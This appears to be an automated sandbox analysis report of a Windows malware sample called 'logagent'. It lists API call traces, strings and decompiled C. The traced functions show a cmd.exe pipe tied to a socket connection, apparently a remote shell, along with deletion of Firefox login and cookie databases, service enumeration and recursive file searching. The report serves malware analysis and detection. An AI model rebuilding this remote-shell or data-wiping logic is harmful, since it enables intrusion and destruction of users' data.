                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                  • getenv.MSVCRT ref: 00402C34
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                  • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                  • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                  • malloc.MSVCRT ref: 00402DA9
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                  • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                  • free.MSVCRT(00000000), ref: 00402E6E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                  • WriteFile.KERNEL32(00000000), ref: 00402EED
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                  • Sleep.KERNEL32(00000064), ref: 00402F07
                                  • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                  • CloseHandle.KERNEL32 ref: 00402F33
                                  • CloseHandle.KERNEL32 ref: 00402F3B
                                  • CloseHandle.KERNEL32 ref: 00402F52
                                  • CloseHandle.KERNEL32 ref: 00402F5A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                  • String ID: SystemDrive$cmd.exe
                                  • API String ID: 1882443052-3633465311
                                  • Opcode ID: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                  • Opcode Fuzzy Hash: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040728F Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004113C9 Relevance: 73.8, APIs: 49, Instructions: 252serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                  • GetLastError.KERNEL32 ref: 00411442
                                  • malloc.MSVCRT ref: 00411458
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 2829549728-0
                                  • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                  • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040751B Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C0A Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                  0x00404c16
                                  0x00404c18
                                  0x00404c1f
                                  0x00404c2f
                                  0x00404c39
                                  0x00404c43
                                  0x00404c4a
                                  0x00404c66
